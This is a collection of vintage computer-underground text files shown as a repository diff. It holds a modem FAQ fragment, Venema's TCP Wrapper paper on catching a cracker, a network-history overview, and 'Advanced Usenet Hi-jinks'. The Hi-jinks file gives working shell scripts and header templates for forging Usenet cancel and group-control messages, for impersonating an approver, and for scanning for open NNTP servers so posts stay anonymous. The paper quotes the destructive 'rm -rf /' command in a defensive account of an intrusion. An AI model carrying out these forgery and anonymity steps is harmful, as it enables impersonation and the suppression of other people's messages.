NO ERROR CONTROL - is displayed whenever one of the new modems is
connected on-line with the target BBS. It simply means that the outdial
modem is not in the MNP reliable modem (with local loop error protection).
You see, MNP is built into these new modems, and that means that when these
new modems call another modem with MNP in it, they will hand-shake and
come up in the Microcom reliable mode - which provides error protection in
the local phone loop. If it is not using MNP and says NO ERROR CONTROL,
the call will still go through just fine to the remote BBS.
"How do I get the Racal-Vadic command mode?"
----------------------------------------------
The Hayes command mode is the only officially supported command mode for
PC Pursuit at this time - to simplify support and ease of use for users.
However, users may use the R-V mode, which does give some better
response messages (such as "Dialing", and also has re-dial). To get
to the R-V mode, type ATZ to get the OK, then ctrl-E and you should
wake up the modem into the R-V mode as it responds "Hello, I'm ready"
with a * . Type ? (cr) for a list of the commands available.
When done with your session, the modem will reset itself into the
Hayes mode as you enter I (cr) to Idle the modem. (or depending on
how you disconnect, it will automatically reset to Hayes mode for the
next user within 10 - 100 seconds).
+725
View File
@@ -0,0 +1,725 @@
TCP WRAPPER
Network monitoring, access control, and booby
traps.
Wietse Venema
Mathematics and Computing Science
Eindhoven University of Technology
The Netherlands
wietse@wzv.win.tue.nl
Abstract
This paper presents a simple tool to monitor and control
incoming network traffic. The tool has been successfully
used for shielding off systems and for detection of cracker
activity. It has no impact on legal computer users, and does
not require any change to existing systems software or con-
figuration files. The tool has been installed world-wide on
numerous UNIX systems without any source code change.
1. Our pet.
The story begins about two years ago. Our university was
under heavy attack by a Dutch computer cracker who again and
again managed to acquire root privilege. That alone would
have been nothing more than an annoyance, but this indivi-
dual was very skilled at typing the following command
sequence:
rm -rf /
For those with no UNIX experience: this command, when exe-
cuted at a sufficiently high privilege level (like root), is
about as destructive as the MS-DOS format command. Usually,
the damage could be repaired from backup tapes, but every
now and then people still lost a large amount of work.
Though we did have very strong indications about the
cracker's identity I cannot disclose his name. We did give
him a nickname, though: "our pet"1.
_________________________
1. Like hond (dog), kat (cat), and muis (mouse).
July 15, 1992
- 2 -
2. The cracker is watching us.
The destructive behavior of the cracker made it very hard to
find out what was going on: the rm -rf removed all traces
very effectively. One late night I noticed that the cracker
was watching us over the network. He did this by frequently
making contact with our finger network service, which gives
information about users. Services such as finger do not
require a password, and almost never keep a record of their
use. That explains why all his fingering activity had
remained unnoticed.
The natural reaction would be to shut down the finger net-
work service. I decided, however, that it would be more
productive to maintain the service and to find out where the
finger requests were coming from.
3. A typical UNIX TCP/IP networking implementation.
In order to explain the problem and its solution I will
briefly summarize a typical UNIX implementation of the
TCP/IP network services. Experts will forgive me when I
make a few simplifications.
Almost every application of the TCP/IP protocols is based on
a client-server model. For example, when someone uses the
telnet command to connect to a host, a telnet server process
is started on the target host. The server process connects
the user to a login process. A few examples are shown in
table 1.
client server application
________________________________
telnet telnetd remote login
ftp ftpd file transfer
finger fingerd show users
systat systatd show users
Table 1. Examples of TCP/IP client-server pairs and
their applications.
The usual approach is to run one daemon process that waits
for all kinds of incoming network connections. Whenever a
connection is established this daemon (usually called inetd)
runs the appropriate server program and goes back to sleep,
waiting for other connections.
4. The "tcp wrapper" trick.
Back to the original problem: how to get the name of the
host that the cracker was spying from. At first sight, this
would require changes to existing network software. There
were a few problems, though:
July 15, 1992
- 3 -
---------
----------------- (ftp)-----| i |
user---| telnet client |----(telnet)--| n |
----------------- . | e |
. | t |
(finger)--| d |
---------
Figure 1. The inetd daemon process listens on the ftp,
telnet etc. network ports and waits for incoming con-
nections. The figure shows that a user has connected to
the telnet port.
----------------- ----------------- ---------
user---| telnet client |------| telnet server |----| login |
----------------- ----------------- ---------
Figure 2. The inetd process has started a telnet
server process that connects the user to a login pro-
cess. Meanwhile, inetd waits for other incoming con-
nections.
o We did not have a source license for the Ultrix, SunOS
and other UNIX implementations on our systems. And no,
we did not have those sources either.
o The Berkeley network sources (from which most of the
commercial UNIX TCP/IP network implementations are
derived) were available, but porting these to our
environments would require an unknown amount of work.
Fortunately, there was a simple solution that did not
require any change to existing software, and that turned out
to work on all UNIX systems that I tried it on. The trick
was to make a swap: move the vendor-provided network server
programs to another place, and install a trivial program in
the original place of the network server programs. Whenever
a connection was made, the trivial program would just record
the name of the remote host, and then run the original net-
work server program.
----------------- -----------------
user---| telnet client |------| tcp wrapper |---> logfile
----------------- -----------------
Figure 3. The original telnet server program has been
moved to some other place, and the tcp wrapper has tak-
en its place. The wrapper logs the name of the remote
host to a file.
July 15, 1992
- 4 -
----------------- ----------------- ---------
user---| telnet client |------| telnet server |----| login |
----------------- ----------------- ---------
Figure 4. The tcp wrapper program has started the real
telnet server and no longer participates. The user can-
not notice any difference.
The first tcp wrapper version was just a few lines of code
that I had carefully copied from some old network daemon
source. Because it did not exchange any information with
the client or server processes, the same tcp wrapper version
could be used for many types of network service.
Although I could install the wrapper only on a dozen systems
it was an immediate success. Figure 5 gives an early exam-
ple.
May 21 14:06:53 tuegate: systatd: connect from monk.rutgers.edu
May 21 16:08:45 tuegate: systatd: connect from monk.rutgers.edu
May 21 16:13:58 trf.urc: systatd: connect from monk.rutgers.edu
May 21 18:38:17 tuegate: systatd: connect from ap1.eeb.ele.tue.nl
May 21 23:41:12 tuegate: systatd: connect from mcl2.utcs.utoronto.ca
May 21 23:48:14 tuegate: systatd: connect from monk.rutgers.edu
May 22 01:08:28 tuegate: systatd: connect from HAWAII-EMH1.PACOM.MIL
May 22 01:14:46 tuewsd: fingerd: connect from HAWAII-EMH1.PACOM.MIL
May 22 01:15:32 tuewso: fingerd: connect from HAWAII-EMH1.PACOM.MIL
May 22 01:55:46 tuegate: systatd: connect from monk.rutgers.edu
May 22 01:58:33 tuegate: systatd: connect from monk.rutgers.edu
May 22 02:00:14 tuewsd: fingerd: connect from monk.rutgers.edu
May 22 02:14:51 tuegate: systatd: connect from RICHARKF-TCACCIS.ARMY.MIL
May 22 02:19:45 tuewsd: fingerd: connect from RICHARKF-TCACCIS.ARMY.MIL
May 22 02:20:24 tuewso: fingerd: connect from RICHARKF-TCACCIS.ARMY.MIL
May 22 14:43:29 tuegate: systatd: connect from monk.rutgers.edu
May 22 15:08:30 tuegate: systatd: connect from monk.rutgers.edu
May 22 15:09:19 tuewse: fingerd: connect from monk.rutgers.edu
May 22 15:14:27 tuegate: telnetd: connect from cumbic.bmb.columbia.edu
May 22 15:23:06 tuegate: systatd: connect from cumbic.bmb.columbia.edu
May 22 15:23:56 tuewse: fingerd: connect from cumbic.bmb.columbia.edu
Figure 5. Some of the first cracker connections ob-
served with the tcp wrapper program. Each connection is
recorded with: time stamp, the name of the local host,
the name of the requested service (actually, the net-
work server process name), and the name of the remote
host. The examples show that the cracker not only used
dial-up terminal servers (such as monk.rutgers.edu),
but also that he had broken into military (.MIL) and
university (.EDU) computer systems.
July 15, 1992
- 5 -
The cracker literally bombarded our systems with finger and
systat requests. These allowed him to see who was on our
systems. Every now and then he would make a telnet connec-
tion, presumably to make a single login attempt and to
disconnect immediately, so that no "repeated login failure"
would be reported to the systems console.
Thus, while the cracker thought he was spying on us we could
from now on see where he was. This was a major improvement
over the past, when we only knew something had happened
after he had performed his rm -rf act.
My initial fear was that we would be swamped by logfile
information and that there would be too much noise to find
the desired signal. Fortunately, the cracker was easy to
recognize:
o He often worked at night, when there is little other
activity.
o He would often make a series of connections to a number
of our systems. By spreading his probes he perhaps
hoped to hide his activities. However, by merging the
logs from several systems it was actually easier to see
when the cracker was in the air.
o No-one else used the systat service.
In the above example, one of the systat connections came
from a system within our university: ap1.eeb.ele.tue.nl,
member of a ring of Apollo workstations. Attempts to alert
their system administrator were in vain: one week later all
their file systems were wiped out. The backups were between
one and two years old, so the damage was extensive.
5. First extension: access control.
I will not go into a discussion on the pros and cons of
publicly-accessible terminal servers with world-wide inter-
net access, but it is clear that any traces that originated
from such a system would be useless for our purposes: we
would need cooperation from US and Dutch telephone com-
panies, from the administrators of those terminal servers,
and so on.
The best thing to do was to refuse connections from open
terminal servers, so that the cracker could reach us only
after breaking into a regular user account. Our hope was
that the would leave some useful traces, so that we would
get to know him a little better.
I built a simple access-control mechanism into the tcp
wrapper. Whenever a connection from a terminal server
showed up in the logs, all traffic from that system would be
July 15, 1992
- 6 -
blocked on our side, and we would ask the responsible
administrators to do the same on their side. Sometimes it
even worked. Figure 6 gives a snapshot of our access-
control files.
/etc/hosts.allow:
in.ftpd: ALL
/etc/hosts.deny:
ALL: terminus.lcs.mit.edu hilltop.rutgers.edu monk.rutgers.edu
ALL: comserv.princeton.edu lewis-sri-gw.army.mil
ALL: ruut.cc.ruu.nl 131.211.112.44
ALL: tip-gsbi.stanford.edu
ALL: tip-quada.stanford.edu
ALL: s101-x25.stanford.edu
ALL: tip-cdr.stanford.edu
ALL: tip-cromemaa.stanford.edu
ALL: tip-cromembb.stanford.edu
ALL: tip-forsythe.stanford.edu
Figure 6. Sample access-control files. The first file
describes which (service, host) combinations are al-
lowed. In this example, the ftp file transfer service
is granted to all systems.
The second file describes which of the remaining (ser-
vice, host) combinations are disallowed. In this exam-
ple, an ever-growing list of open terminal servers is
refused access.
(service, host) pairs that are not matched by any of
the access-control files are always allowed.
6. Our turn: watching the cracker.
Now that the cracker could no longer attack us from
publicly-accessible terminal servers, all he could do was to
break into a regular user account and proceed from there.
That is exactly what he did. The next step was to find out
what user accounts were involved.
I quickly cobbled together something that would consult a
table of "bad" sites and send a finger and systat probe
whenever one made a connection to us. Now we would be able
to watch the cracker just like he had been watching us.
July 15, 1992
- 7 -
During the next months I identified several broken-into
accounts. Each time I would send a notice to the system
administrators, and a copy to CERT2 to keep them informed of
our progress.
Jan 30 04:55:09 tuegate: telnetd: connect from guzzle.Stanford.EDU
Jan 30 05:10:02 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:17:57 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:18:24 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:18:34 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:18:38 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:18:44 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:21:03 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:24:46 tuegate: systatd: connect from guzzle.Stanford.EDU
Jan 30 05:27:20 svin01: fingerd: connect from gloworm.Stanford.EDU
Jan 30 05:33:33 svin01: telnetd: connect from guzzle.Stanford.EDU
Jan 30 05:33:38 svin01: telnetd: connect from guzzle.Stanford.EDU
Jan 30 05:33:41 svin01: telnetd: connect from guzzle.Stanford.EDU
Jan 30 05:33:50 svin01: ftpd: connect from guzzle.Stanford.EDU
Jan 30 05:33:58 svin01: fingerd: connect from math.uchicago.edu
Jan 30 05:34:08 svin01: fingerd: connect from math.uchicago.edu
Jan 30 05:34:54 svin01: fingerd: connect from math.uchicago.edu
Jan 30 05:35:16 svin01: fingerd: connect from guzzle.Stanford.EDU
Jan 30 05:35:36 svin01: fingerd: connect from guzzle.Stanford.EDU
Figure 7. A burst of network activity, most of it from
Stanford.
Wed Jan 30 05:10:08 MET 1991
[guzzle.stanford.edu]
Login name: adrian In real life: Adrian Cooper
Directory: /u0/adrian Shell: /phys/bin/tcsh
On since Jan 29 19:30:18 on ttyp0 from tip-forsythe.Sta
No Plan.
Figure 8. A reverse finger result, showing that only
one user was logged on at the time.
The examples in figures 7 and 8 show activity from a single
user who was logged in on the system guzzle.Stanford.EDU.
The account name is adrian, and the login came in via the
terminal server tip-forsythe.Stanford.EDU. Because of that
terminal server I wasn't too optimistic. Things turned out
to be otherwise.
_________________________
2. Computer Emergency Response Team, an organization that
was called into existence after the Internet worm in-
cident in 1988.
July 15, 1992
- 8 -
CERT suggested that I contact Stephen Hansen of Stanford
university. He had been monitoring the cracker for some
time, and his logs gave an excellent insight into how the
cracker operated. The cracker did not use any black magic:
he knew many system software bugs, and was very persistent
in his attempts to get superuser privilege. Getting into a
system was just a matter of finding an account with a weak
password.
For several months the cracker used Stanford as his home
base to attack a large number of sites. One of his targets
was research.att.com, the AT&T Bell labs gateway. Bill
Cheswick and colleagues even let him in, after setting up a
well-protected environment where they could watch him. This
episode is extensively described in [1].
Unfortunately, the cracker was never arrested. He should
have waited just one year. Instead, the honor was given to
two much less harmful Dutch youngsters, at the end of Febru-
ary, 1992.
7. Second extension: booby traps.
Automatic reverse fingers had proven useful, so I decided to
integrate the "ad hoc" reverse finger tool with the tcp
wrapper. To this end, the access-control language was
extended so that arbitrary shell commands could be speci-
fied.
Now that the decision to execute shell commands was based on
both the service and the host name, it became possible to
automatically detect some types of "suspicious" traffic.
For example: remote access to network services that should
be accessed only from local systems.
Over the past months I had noticed several tftp (trivial
file transfer protocol) requests from far-away sites. This
protocol does not require any password, and it is often used
for downloading systems software to diskless workstations or
to dedicated network hardware. Until a few years ago, the
protocol could also be used to read any file on the system.
For this reason, it is still popular with crackers.
The access-control tables (fig. 9) were set up such that
local tftp requests would be handled in the usual manner.
Remote tftp requests, however, would be refused. Instead of
the requested file, a finger probe would be sent to the
offending host.
The alarm goes off about once every two months. The action
is as usual: send a message to CERT and to the site contact
(never to the broken-into system).
July 15, 1992
- 9 -
/etc/hosts.allow:
in.tftpd: LOCAL, .win.tue.nl
/etc/hosts.deny:
in.tftpd: ALL: /usr/ucb/finger -l @%h 2>&1 | /usr/ucb/mail wswietse
Figure 9. Example of a booby trap on the tftp service.
The entry in the first access-control file says that
tftp connections from hosts within its own domain are
allowed.
The entry in the second file causes the tcp wrapper to
perform a reverse finger in all other cases. The %h se-
quence is replaced by the actual remote host name. The
result is sent to me by electronic mail.
This is an example of recent tftp activity:
Jan 4 18:58:28 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Jan 4 18:59:45 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Jan 4 19:01:02 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Jan 4 19:02:19 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Jan 4 19:03:36 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Jan 4 19:04:53 svin02 tftpd: refused connect from E40-008-8.MIT.EDU
Due to the nature of the tftp protocol, the refused request
was repeated every 77 seconds. The retry interval is imple-
mentation dependent and can give some hints about the type
of the remote system.
According to the reverse finger results, only one person was
active at that time: apparently, the login came from a sys-
tem in France.
Login name: mvscott In real life: Mark V Scott
Office: 14S-134, x3-6724
Directory: /mit/mvscott Shell: /bin/csh
On since Jan 4 12:46:44 on ttyp0 from cnam.cnam.fr
12 seconds Idle Time
No Plan.
France told me that the cracker came from a NASA terminal
server (sdcds8.gsfc.nasa.gov):
hyper1 ttyp3 sdcds8.gsfc.nasa Sat Jan 4 17:51 - 20:47 (02:55)
July 15, 1992
- 10 -
Evidently, this person liked to cross the Atlantic a lot:
from NASA to France, from France to MIT, and from MIT to the
Netherlands.
The example in this section gives only a limited illustra-
tion of the use of booby traps. Booby traps can be much more
useful when installed on firewall systems [2], whose primary
purpose is to separate an organizational network from the
rest of the world. A typical firewall system provides only a
limited collection of network services to the outer world,
for example: telnet and smtp. By placing booby traps on the
remaining network ports one can implement an effective
early-warning system [1].
8. Conclusions.
The tcp wrapper is a simple but effective tool for monitor-
ing and controlling network activity. Our FTP logs show that
it has been installed in almost every part of the world, and
that it is being picked up almost every day.
To briefly recapitulate the essential features of the tool:
o There is no need to modify existing software or confi-
guration files.
o The default configuration is such that the software can
be installed "out of the box" on most UNIX implementa-
tions.
o No impact on legal users.
o The wrapper program does not exchange any data with the
network client or server process, so that the risk of
software bugs is extremely small.
o It is suitable for both TCP (connection oriented) and
UDP (datagram) services that are covered by a central
daemon process such as the inetd.
o Protection against hosts that pretend to have someone
elses name (name server spoofing). This is important
for network services such as rsh and rlogin whose
authentication scheme is based on host names. When a
host name or address mismatch is detected the connec-
tion is dropped even before the access-control files
are consulted.
o The optional access-control facility can be used to
shield off open systems. Network routers can perform a
similar function, but they seldom keep a record of
unwanted traffic. On the other hand, network routers
can be useful to block access to ports that normally
cannot be covered with wrapper-like programs, such as
July 15, 1992
- 11 -
the portmapper, NIS, NFS and X server network ports.
o The booby-trap facility can be used to implement
early-warning systems. This can be especially useful
for so-called firewall computer systems that only pro-
vide a limited set of network services to the outer
world. The remaining network ports can be turned into
booby traps.
Of course, the tcp wrapper is just one of the things I have
set up on our systems: many other trip wires have been
installed as well. Fortunately, I was able to do so before
our present system administrator was installed. In any case,
Dutch crackers seem to think that the systems at Eindhoven
University are reasonably protected.
9. Availability.
Several releases of the tcp wrapper source have featured in
the USENET comp.sources.misc newsgroup. The most recent
version is available from:
ftp.uu.net:/comp.sources.misc/volumexx/log_tcp,
cert.org:/pub/tools/tcp_wrappers/tcp_wrappers.*,
ftp.win.tue.nl:/pub/security/log_tcp.shar.Z.
10. About the author.
Wietse Zweitze Venema studied experimental nuclear physics
at Groningen University. After finishing his Ph.D. disserta-
tion on left-right symmetry in nuclear beta decay he joined
the Mathematics and Computing Science department at the
Eindhoven University of Technology, where he is now a con-
sultant at the division of Operations Research, Statistics
and Systems Theory.
11. References.
[1] W.R. Cheswick, An Evening with Berferd, in Which a
Cracker is Lured, Endured, and Studied. Proceedings of
the Winter USENIX Conference (San Francisco), January
1992.
[2] S. Carl-Mitchell, J.S. Quarterman, Building Internet
Firewalls. UnixWorld, February 1992.
July 15, 1992

File diff suppressed because it is too large Load Diff
+129
View File
@@ -0,0 +1,129 @@
Advanced Usenet Hi-jinks
-------------------------
To specifically cancel someone else's article, you need its message-ID. Your
message headers, in addition to what's already there, should also contain the
following with that message-ID in it. This makes it a "control message".
NOTE: control messages generally require an Approved: header as well, so
you should add one.
Subject: cmsg cancel <xb8700A@twits.site.com>
Control: cancel <xb8700A@twits.site.com>
Approved: luser@twits.site.com
Newsgroups are created and destroyed with control messages, too. If you
wanted to create, for instance, comp.misc.microsoft.sucks, your control
headers would look like
Subject: cmsg newgroup comp.misc.microsoft.sucks
Control: newgroup comp.misc.microsoft.sucks
Add on the string "moderated" at the end of these if you want the group to
be "moderated with no moderator" as with alt.hackers. Somewhere in the
body of your message, you should include the following text, changed with
the description of the group you're creating:
For your newsgroups file:
comp.misc.microsoft.sucks We don't do windows
To remove a group, substitute "rmgroup" for "newgroup" in the header lines
above. Keep in mind that most sites run all "rmgroup" requests through
a human news-master, who may or may not decide to honor it. Group creation
is more likely to be automatic than deletion at most installations. Any
newsgroup changes are more likely to take effect if the come from me, since
my name is hardwired into many of the NNTP control scripts, so using the
From: and Approved: headers from this posting is recommended.
Save your changed article, check it to make sure it contains NO reference
to yourself or your own site, and send it to your favourite NNTP server that
permits transfers via the IHAVE command, using the following script:
=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server
if test "$2" = "" ; then
echo usage: $0 filename server
exit 1
fi
if test ! -f $1 ; then
echo $1: not found
exit 1
fi
# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
sed 's/.*-[Ii][Dd]: //'`
echo $msgid
( sleep 5
echo IHAVE $msgid
sleep 5
cat $1
sleep 1
echo "."
sleep 1
echo QUIT ) | telnet $2 119
=======================
If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file
full of saved netnews into a list of hosts to try. Edit the output
of this if you want, to remove obvious peoples' names and other trash.
=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================
Once you have your host list, feed it to the following script.
=======================
#! /bin/sh
while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
sleep 5
echo ihave IamSOk00l@podunk.edu
sleep 4
echo .
echo quit
sleep 1
echo quit
) | telnet
done
=======================
If the above script is called "findem" and you're using csh, you should do
findem < list >& outfile
so that ALL output from telnet is captured. This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335". These mark
answers from servers that might be willing to accept an article. This isn't a
completely reliable indication, since some servers respond with acceptance and
later drop articles. Try a given server with a slightly modified repeat of
someone else's message, and see if it eventually appears.
Sometimes the telnets get into an odd state, and freeze, particularly when
a host is refusing NNTP connections. If you manually kill these hung telnet
processes but not the main script, the script will continue on. In other
words, you may have to monitor the finding script a little while it is
running.
You will notice other servers that don't necessarily take an IHAVE, but
say "posting ok". You can probably do regular POSTS through these, but they
will add an "NNTP-Posting-Host: " header containing the machine YOU came from
and are therefore unsuitable for completely anonymous use.
+153
View File
@@ -0,0 +1,153 @@
Unauthorised Access UK 0636-708063
Jester Sluggo presents
an insight on
Wide-Area Networks
Part 1
Part 1 contains information on ARPANET and CSNET.
Part 2 contains information on BITNET, MFENET, UUCP and USENET.
It is best if you read both files to better understand each other.
These files will cover general information on wide-area networks, (I.E.
ARPANET, CSNET, BITNET, MFENET, UUCP and USENET), but may contain information
in relationship with other networks not emphasized in these files. These files
are NOT a hacker's tutorial/guide on these systems.
ARPANET
~~~~~~~
ARPANET. The ARPANET, which is a major component of the NSFnet [National
Science Foundation Network], began in 1969 as an R&D project managed by DARPA
[Dept. of Defense Advanced Research Projects Agency]. ARPANET was an experiment
in resource sharing, and provided survivable (multiply connected), high
bandwidth (56 Kilobits per second) communications links between major existing
computational resources and computer users in academic, industrial, and
government research laboratories. ARPANET is managed and funded by by the DCA
[Defense Communications Agency] with user services provided by a network
information center at SRI International.
ARPANET served as a test for the development of advanced network protocols
including the TCP-IP protocol suite introduced in 1981. TCP-IP and
particularly IP, the internet protocol, introduced the idea of inter-
networking -- allowing networks of different technologies and connection
protocols to be linked together while providing a unified internetwork
addressing scheme and a common set of transport of application protocols. This
development allowed networks of computers and workstations to be connected to
the ARPANET, rather than just single-host computers. TCP-IP remain the most
available and advanced, non-vendor-specific, networking protocols and have
strongly influenced the current international standards of activity. TCP-IP
provide a variety of application services, including remote logon (Telnet),
file transfer (FTP), and electronic mail (SMTP and RFC822).
ARPANET technology was so successful that in 1982, the Dept. of Defense
(DOD) abandoned their AUTODIN II network project and adopted ARPANET technology
for the Dept. of Defense Data Network (DDN). The current MILNET, which was
split form the original ARPANET in 1983, is the operational, unclassified
network component of the DDN, while ARPANET remains an advanced network R&D
tested for DARPA. In practice, ARPANET has also been an operational network
supporting DOD, DOE [Dept. of Energy], and some NSF-sponsored computer science
researchers. This community has come to depend on the availability of the
network. Until the advent of NSFnet, access to ARPANET was restricted to this
community.
As an operational network in the scientific and engineering research
community, and with the increasing availability of affordable super-
minicomputers, ARPANET was used less as a tool for sharing remote computational
resources than it was for sharing information. The major lesson from the
ARPANET experience is that information sharing is a key benefit of computer
networking. Indeed it may be argued that many major advances in computer
systems and artificial intelligence are the direct result of the enhanced
collaboration made possible by ARPANET.
However, ARPANET also had the negative effect of creating a have--have not
situation in experimental computer research. Scientists and engineers carrying
out such research at institutions other than the twenty or so ARPANET sites
were at a clear disadvantage in accessing pertinent technical information and
in attracting faculty and students.
In October 1985, NSF and DARPA, with DOD support, signed a memorandum of
agreement to expand the ARPANET to allow NSF supercomputer users to use ARPANET
to access the NSF supercomputer centers and to communicate with each other.
The immediate effect of this agreement was to allow all NSF supercomputer users
on campuses with an existing ARPANET connection to use ARPANET. In addition,
the NSF supercomputer resource centers at the University of Illinois and
Cornell University are connected to ARPANET. In general, the existing ARPANET
connections are in departments of computer science or electrical engineering
and are not readily accessible by other researchers. However, DARPA has
requested that the campus ARPANET coordinators facilitate access by relevant
NSF researchers.
As part of the NSFnet initiative, a number of universities have requested
connection to ARPANET. Each of these campuses has undertaken to establish a
campus network gateway accessible to all due course, be able to use the ARPANET
to access the NSF supercomputer centers, from within their own local computing
environment. Additional requests for connection to the ARPANET are being
considered by NSF.
CSNET
~~~~~
CSNET. Establishment of a network for computer science research was first
suggested in 1974, by the NSF advisory committee for computer science. The
objective of the network would be to support collaboration among researchers,
provide research sharing, and, in particular, support isolated researchers in
the smaller universities.
In the spring of 1980, CSNET [Computer Science Network], was defined and
proposed to NSF as a logical network made up of several physical networks of
various power, performance, and cost. NSF responded with a five year contract
for development of the network under the condition that CSNET was to be
financially self-supporting by 1986. Initially CSNET was a network with five
major components -- ARPANET, Phonenet (a telephone based message relaying
service), X25Net (suppose for the TCP-IP Protocol suite over X.25-based public
data networks), a public host (a centralized mail service), and a name server
(an online database of CSNET users to support transparent mail services). The
common service provided across all these networks is electronic mail, which is
integrated at a special service host, which acts as an electronic mail relay
between the component networks. Thus CSNET users can send electronic mail to
all ARPANET users and vice-versa. CSNET, with DARPA support, installed
ARPANET connections at the CSNET development sites at the universities of
Delaware and Wisconsin and Purdue University.
In 1981, Bolt, Beranek, and Newman (BBN) contracted to provide technical
and user services and to operate the CSNET Coordination and Information Center.
In 1983, general management of CSNET was assumed by UCAR [the Univ. Corporation
for Atmospheric Research], with a subcontract to BBN. Since then, CSNET has
grown rapidly and is currently an independent, financially stable, and
professionally managed service to the computer research community. However,
the momentum created by CSNET's initial success caused the broad community
support it now enjoys. More than 165 university, industrial, and government
computer research groups now belong to CSNET.
A number of lessons may be learned from the CSNET experience.
1) The network is now financially self-sufficient, showing that a research is
willing to pay for the benefits of a networking service. (Users pay usage
charges plus membership fees ranging from $2000 for small computer science
departments to $30,000 for the larger industrial members.)
2) While considerable benefits are available to researchers from simple
electronic mail and mailing list services -- the Phonenet service -- most
researchers want the much higher level of performance and service provided by
the ARPANET.
3) Providing a customer support and information service is crucial to the
success of a network, even (or perhaps especially) when the users are themselves sophisticated computer science professionals. Lessons from the
CSNET experience will provide valuable input to the design, implementation,
provision of user services, and operation and management of NSFnet, and, in
particular, to the development of the appropriate funding model for NSFnet.
CSNET, with support from the NSFnet program, is now developing the CYPRESS
project which is examining ways in which the level of CSNET service may be
improved, at low cost, to research departments. CYPRESS will use the DARPA
protocol suite and provide ARPANET-like service on low-speed 9600-bit-per-
second leased line telephone links. The network will use a nearest neighbor
topology, modeled on BITNET, while providing a higher level of service to users
and a higher level of interoperability with the ARPANET. The CYPRESS project is
designed to replace or supplement CSNET use of the X.25 public networks, which
has proved excessively expensive. This approach may also be used to provide a
low-cost connection to NSFnet for smaller campuses.
/
\
/ luggo !!
Please give full credit for references to the following:
Dennis M. Jennings, Lawrence H. Landweber, Ira H. Fuchs, David J. Faber, and W.
Richards Adrion.
Any questions, comments or Sluggestions can be emailed to me at Metal Shop,
or sent via snailmail to the following address until 12-31-1986:
J. Sluggo
P.O. Box 93
East Grand Forks, MN 56721
Downloaded From P-80 Systems 304-744-2253
File diff suppressed because it is too large Load Diff
File diff suppressed because it is too large Load Diff